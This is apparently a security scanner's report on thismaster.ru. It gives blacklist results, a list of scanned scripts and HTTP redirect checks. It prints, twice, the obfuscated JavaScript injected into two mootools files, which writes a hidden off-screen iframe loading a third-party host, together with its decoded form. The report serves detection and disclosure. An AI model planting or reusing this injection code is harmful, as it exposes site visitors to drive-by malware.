Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thismaster.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://thismaster.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://thismaster.ru/ | 200 OK Content-Length: 35677 Content-Type: text/html | clean |
http://thismaster.ru/media/system/js/core.js | 200 OK Content-Length: 6282 Content-Type: application/x-javascript | clean |
http://thismaster.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 2055 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' } if (!control_agent()) { var cookie = getCookie('kegaoeutg18sf'+'fekfsj3asjf'); if (cookie == undefined) { setCookie('kegaoeutg18sf'+'fekfsj3asjf', true, 172804); document.write('<'+'if'+'ra'+'m'+'e'+' s'+'r'+'c'+'='+'"http://transoprt.radioamator.ro/htrsyrthwh19.html" st'+'yle="posi'+'tion:absolute'+';'+'left'+':'+'-'+'1284'+'px'+';'+'top'+':'+'-'+'1284'+'px'+';'+'" height="134" width="134"><'+'/'+'if'+'ram'+'e'+'>'); } }; })(); Decoded script: <iframe src="http://transoprt.radioamator.ro/htrsyrthwh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> Antivirus reports:
| ||
http://thismaster.ru/media/system/js/caption.js | 200 OK Content-Length: 2857 Content-Type: application/x-javascript | clean |
http://thismaster.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 2055 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' } if (!control_agent()) { var cookie = getCookie('kegaoeutg18sf'+'fekfsj3asjf'); if (cookie == undefined) { setCookie('kegaoeutg18sf'+'fekfsj3asjf', true, 172804); document.write('<'+'if'+'ra'+'m'+'e'+' s'+'r'+'c'+'='+'"http://transoprt.radioamator.ro/htrsyrthwh19.html" st'+'yle="posi'+'tion:absolute'+';'+'left'+':'+'-'+'1284'+'px'+';'+'top'+':'+'-'+'1284'+'px'+';'+'" height="134" width="134"><'+'/'+'if'+'ram'+'e'+'>'); } }; })(); Decoded script: <iframe src="http://transoprt.radioamator.ro/htrsyrthwh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe> Antivirus reports:
| ||
http://thismaster.ru/modules/mod_sp_image_rotator/assets/script/_class.noobSlide.js | 200 OK Content-Length: 7412 Content-Type: application/x-javascript | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 11624 Content-Type: application/javascript | clean |
http://thismaster.ru/modules/mod_random_image_extended/shadowbox/shadowbox.js | 200 OK Content-Length: 39355 Content-Type: application/x-javascript | clean |
http://stroim.ru/templates/stroim/js/share42.js | 404 Not Found Content-Length: 7559 Content-Type: text/html | clean |
http://stroim.ru/modules/jquery_update/replace/jquery.min.js?u | 200 OK Content-Length: 57254 Content-Type: application/x-javascript | clean |
http://stroim.ru/misc/drupal.js?u | 200 OK Content-Length: 9834 Content-Type: application/x-javascript | clean |
http://stroim.ru/sites/default/files/languages/ru_66b6b1e94e5f9c505b626978bb91ab31.js?u | 200 OK Content-Length: 11444 Content-Type: application/x-javascript | clean |
http://stroim.ru/modules/block_edit/block_edit.js?u | 200 OK Content-Length: 509 Content-Type: application/x-javascript | clean |
http://stroim.ru/modules/dhtml_menu/dhtml_menu.js?u | 200 OK Content-Length: 4963 Content-Type: application/x-javascript | clean |
http://stroim.ru/modules/lightbox2/js/auto_image_handling.js?u | 200 OK Content-Length: 10241 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thismaster.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 23 May 2014 04:16:32 GMT
Pragma: no-cache
Server: nginx/1.4.7
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: b9e89acaf680d86a5c1a477d290a3e1f=261dc1b871333a26d91d96908a29d37e; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: thismaster.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 23 May 2014 04:16:32 GMT
Pragma: no-cache
Server: nginx/1.4.7
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: b9e89acaf680d86a5c1a477d290a3e1f=261dc1b871333a26d91d96908a29d37e; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: thismaster.ru
Referer: http://www.google.com/search?q=thismaster.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thismaster.ru
Referer: http://www.google.com/search?q=thismaster.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.